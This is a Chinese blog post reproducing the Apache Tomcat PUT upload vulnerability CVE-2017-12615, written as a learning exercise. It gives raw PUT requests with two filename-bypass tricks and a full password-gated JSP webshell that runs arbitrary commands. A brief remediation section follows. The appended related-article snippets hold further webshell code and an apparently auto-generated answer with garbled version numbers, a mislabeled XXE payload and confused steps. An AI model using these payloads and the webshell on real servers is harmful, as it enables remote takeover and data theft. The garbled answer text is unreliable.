tomcat 文件上传漏洞(CVE-2017-12615) 复现

最新推荐文章于 2024-06-26 21:49:41 发布
最新推荐文章于 2024-06-26 21:49:41 发布
阅读量1.1k 收藏 1
点赞数 2
分类专栏: 文件上传 漏洞复现 文章标签: tomcat CVE-2017-12615
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41954384/article/details/97630243
版权

前言

CVE-2017-12615属于文件上传漏洞,当tomcat运行在windows主机上,且启用了http put请求方法(将readonly初始化参数设置为false),攻击者将有可能通过精心构造的攻击请求向服务器上传包含恶意代码的jsp文件,之后jsp代码将有可能被服务器执行。

影响版本

Apache Tomcat 7.0.0-7.0.81

原理讲解

因为在Tomcat 7.0/conf/web.xml里面有对readonly的设置,如果是false的话,我们就可以通过抓包改包的方式去修改请求的方式为PUT来上传文件。

上传姿势

因为在服务器端有对jsp的相应过滤,所以我们直接上传jsp的话,服务器是不会解析的,会返回状态码400(bad request),所以要有一定的绕过方法。

姿势一

使用服务器对其处理过程的文件名的识别存在差异,通过上传test.jsp/识别为非jsp文件,而去保存文件
payload如下

PUT /222.jsp/ HTTP/1.1
Host: 192.168.75.131:8080
User-Agent: JNTASS
DNT: 1
Connection: close

...jsp shell...

jsp shell

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%>
<%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''

通过burp改包,上传shell
在这里插入图片描述
通过我们写的shell去访问指定的目录
在这里插入图片描述
成功getshell

姿势二

通过windows的NTFS的相关设置而研究出的一种绕过姿势

All files on an NTFS volume consist of at least one stream - the main stream – this is the normal, 
viewable file in which data is stored. The full name of a stream is of the form below.

<filename>:<stream name>:<stream type>

The default data stream has no name. That is, the fully qualified name for the default stream for 
a file called "sample.txt" is "sample.txt::$DATA" since "sample.txt" is the name of the file and "$DATA" 
is the stream type.
默认数据流没有名称。也就是说,默认流的完全限定名名为“sample.txt”的文件是“sample.txt::$data”,因为“sample.txt”是文件名和“$data”是流类型。

所以构造payload

PUT /111.jsp::$DATA HTTP/1.1
Host: 192.168.75.131:8080
User-Agent: JNTASS
DNT: 1
Connection: close

...jsp shell...

通过burp的一顿操作
在这里插入图片描述
返回状态码201表示已创建
但是这种方法虽然能上传上去,但是服务器并不解析
在这里插入图片描述
还没找到原因,之后找到原因后再更新。

漏洞修复

因为**/**的特性,文件上传的漏洞影响的版本比较多,从5.x-9.x无不中枪。此漏洞最好的防御措施就是conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true,才能防止漏洞。

参考链接

https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e
飞鱼的企鹅
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tomcat 文件上传 (CVE-2017-12615)漏洞复现
weixin_42675091的博客
09-01 391
tomcat 文件上传 (CVE-2017-12615)漏洞复现
tomcat漏洞总结.rar
04-21
本文件包含Tomcat近几年爆发的4个严重漏洞,包含从tomcat弱口令上传,到tomcatPUT上传小马,本地权限提升一级反序列化漏洞,其中弱口令包含2本字典以及详细用法,PUT上传包含POC,反序列化和权限提升包含代码及详细操作,仅供学习使用,请不要用于非法以及商业活动
CVE-2020-26048(文件上传+SQL注入)
最新发布
Battery的博客
06-26 3万+
CuppaCMS是一套内容管理系统(CMS)。CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。在/components/table_manager/路径下存在sql注入。
Tomcat put方法任意文件上传漏洞CVE-2017-12615复现
君莫hacker的博客
09-15 7645
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现1. 访问主页2. 漏洞测试3. 上传jsp木马--命令执行4. 上传成功,执行命令5. 上传jsp一句话木马6. 上传成功,冰蝎连接0x04 漏洞修复 0x01 漏洞介绍 漏洞描述 在一定条件下,攻击者可以利用这个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险 漏洞编号 CV
Tomcat漏洞复现
挚爱凝华的博客
04-14 485
tomcat put方法任意写文件漏洞 抓包修改为PUT类型上传文件 上传成功 尝试上传jsp文件发现失败,不允许上传 我们在末尾输入%20,由于不允许上传空格,所以会默认删除,从而进行绕过 tomcat弱口令漏洞 输入tomcattomcat登陆成功进行上传木马 <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoa..
Apache Tomcat任意文件上传漏洞(CVE-2017-12615)
ran的博客
01-31 2064
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,并且能被服务器执行。2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616。漏洞影响:上传包含任意代码的文件,并且能被服务器执行。放包后再次访问“1.jsp”,发现存在了。
Tomcat任意文件上传漏洞CVE-2017-12615
qq_58000413的博客
09-15 1086
访问222.jsp页面发现有内容(这里是Hello java的原因是我自己已经上传过一次,由于已经实操过一遍不想再次上传所以就用了第一次实操的222.jsp文件,还请见谅)验证成功,则当我们上传的内容是jsp的一句话那么我们就可以拿下这台服务器,这里由于是自己购买的服务器就不上传一句话木马了。总体来说这个漏洞复现起来还是比较简单的。Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
Tomcat利用put任意写文件漏洞(CVE-2017-12615)实验复现
weixin_51641247的博客
02-12 569
Tomcat put方法任意文件上传漏洞复现; burpsuit上传文件, 利用冰蝎进行连接,管理网站
CVE-2017-12615Tomcat任意文件上传漏洞复现
Jerry____的博客
12-04 1397
一:漏洞介绍 1.影响版本:Apache Tomcat 7.0.0 - 7.0.81 2.可以任意上传脚本文件 二:环境搭建 利用vulhub搭建环境 1、进入vulhub对应的漏洞目录下 cd /vulhub/tomcat/CVE-2017-12615 2.一键搭建环境 docker-compose up -d 三:漏洞利用 1、进入http://your-ip:8080,查看环境是否搭建...
tomcat漏洞之任意文件上传CVE-2017-12615
weixin_53711701的博客
12-24 2933
tomcat漏洞之任意文件上传CVE-2017-12615
buuctf [Tomcat]CVE-2017-12615
qq_1873822的博客
03-17 1539
漏洞简介 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。 漏洞影响 Apache Tomcat 7.0.0 – 7.0.81 ...
CVE-2017-12615/CVE-2017-12616:Tomcat信息泄漏和远程代码执行漏洞分析报告
weixin_34270865的博客
09-21 312
一. 漏洞概述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,官方评级为高危,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传...
Tomcat漏洞CVE-2017-12615 上传漏洞
jingshuishenlong的专栏
04-07 166
2019年中职组“网络空间安全”赛项(竞赛任务书--A)第4题复现方法 1. 漏洞原理 Tomcat配置文件web.xml中,servlet配置了readonly=fasle时,会引发任意文件上传漏洞。 readonly参数默认是true,即不允许delete和put操作,所以通过XMLHttpRequest对象的put或者delete方法访问就会报告http 403错误。但很多时候为了支持REST服务,会设置该属性为false。 当存在漏洞Tomcat运行在Windows/Linux主机上, 且
cve-2017-12615漏洞复现
06-28
### 回答1: cve-2017-12615漏洞是Apache Tomcat服务器中的一个远程代码执行漏洞。攻击者可以通过发送特定的HTTP请求来利用该漏洞,从而在服务器上执行任意代码。 要复现漏洞,需要满足以下条件: 1. 目标服务器上运行的是Apache Tomcat 7..至7..79版本或8.5.至8.5.16版本。 2. 目标服务器上存在一个Web应用程序,其中包含一个可上传文件的Servlet。 3. 目标服务器上的Web应用程序未正确配置,允许攻击者上传包含恶意代码的JSP文件。 攻击者可以通过发送以下HTTP请求来利用该漏洞: PUT /test.jsp/ HTTP/1.1 Host: target.com Connection: close Content-Length: 100 <% out.println("Hello, world!"); %> 其中,test.jsp是攻击者上传的包含恶意代码的JSP文件。攻击者还需要在请求中包含一个特殊的Content-Type头,以触发漏洞。 如果攻击成功,攻击者就可以在目标服务器上执行任意代码,包括获取敏感信息、修改数据或者控制整个服务器。因此,建议管理员及时升级Apache Tomcat服务器,或者对Web应用程序进行正确的配置和安全审计。 ### 回答2: CVE-2017-12615漏洞是Apache Tomcat中的一个目录遍历漏洞,它使得攻击者能够通过发送特定的HTTP请求,获取Tomcat服务器上应用程序的敏感信息。这种漏洞的原因是Tomcat默认启用了WebDAV(Web Distributed Authoring and Versioning)服务,攻击者可以发送特定的HTTP PUT请求利用该漏洞向服务器发送恶意的WAR文件,并且可以通过使用Windows UNC路径造成RCE漏洞。 下面是CVE-2017-12615漏洞复现步骤: 1.安装Tomcat服务器 2.根据Tomcat的版本,下载特定的利用工具(e.g.,ysoserial.jar 或者wmx.jar)。 3.使用ysoserial.jar或者wmx.jar(如图所示)创建一个恶意文件,并通过PUT请求将它上传到目标服务器。 4.在表单中输入如下内容: PUT /test.txt/WEB-INF/web.xml HTTP/1.1 Host: [Tomcat address]:[listening port] User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/xml Content-Length: 284 <?xml version="1.0"?> <!DOCTYPE x [ <!ELEMENT x ANY> <!ENTITY % p1 SYSTEM "file:///c:/windows/system32/test.bat"> <!ENTITY % p2 "<!ENTITY p3 '′%p1;%p1;′'>"> %p2;%p3; ]> 5.从服务器上获取war文件并进行反序列化,验证漏洞是否真实存在。 6.如果漏洞存在,则攻击者可以使用该漏洞获取Tomcat服务器上应用程序的敏感信息,并且可以在服务器上执行任意命令。 为了缓解该漏洞产生的风险,我们可以通过禁用WebDAV服务、运行Tomcat服务器以非特权用户身份、 对上传文件类型进行限制, 或者升级最新的Tomcat版本等方式来解决该漏洞。 ### 回答3: CVE-2017-12615 是 Apache Tomcat 中的一个远程代码执行漏洞。该漏洞存在于 Tomcat 7.0.0 到 7.0.79 版本和 Tomcat 8.5.0 到 8.5.16 版本中。攻击者可以利用该漏洞通过 HTTP 协议上传恶意 JSP 文件并执行任意命令。 为了演示该漏洞复现,我们需要先搭建一个虚拟机环境来运行 Apache Tomcat。在这里,我们以 Ubuntu 16.04.6 LTS 作为漏洞环境的操作系统。 安装 Apache Tomcat 首先,我们需要安装 Apache Tomcat。在终端窗口中执行以下命令: sudo apt-get update sudo apt-get install tomcat7 安装完成后,我们可以通过访问以下 URL 来确认 Tomcat 是否成功安装: http://localhost:8080/ 如果可以看到 Tomcat 的欢迎页面,则说明安装成功。 复现漏洞 接下来,我们需要复现 CVE-2017-12615 漏洞。步骤如下: 1. 创建一个名为 test.jsp 的 JSP 文件,该文件包含以下代码: <% if ("POST".equals(request.getMethod())) { Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while ((line = in.readLine()) != null) { out.println(line); } in.close(); } %> 2. 通过以下命令创建一个名为 test.war 的 Web 应用程序文件: jar -cvf test.war test.jsp 3. 接下来,我们需要在 Tomcat 的 webapps 目录下创建一个名为 test 目录。接着,将上传的 test.war 文件复制到该目录下: sudo mkdir /var/lib/tomcat7/webapps/test sudo mv test.war /var/lib/tomcat7/webapps/test/ 4. 通过以下 URL 访问 test.jsp 文件,可以发现该页面中含有一个命令执行的输入框: http://localhost:8080/test/test.jsp 5. 在输入框中输入以下命令,即可执行该命令并返回结果: cmd=ls 我们可以看到,这个漏洞可以允许攻击者上传包含恶意代码的 JSP 文件并执行恶意命令,扰乱服务器系统。因此,我们需要对 Apache Tomcat 应用程序服务器进行及时修复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值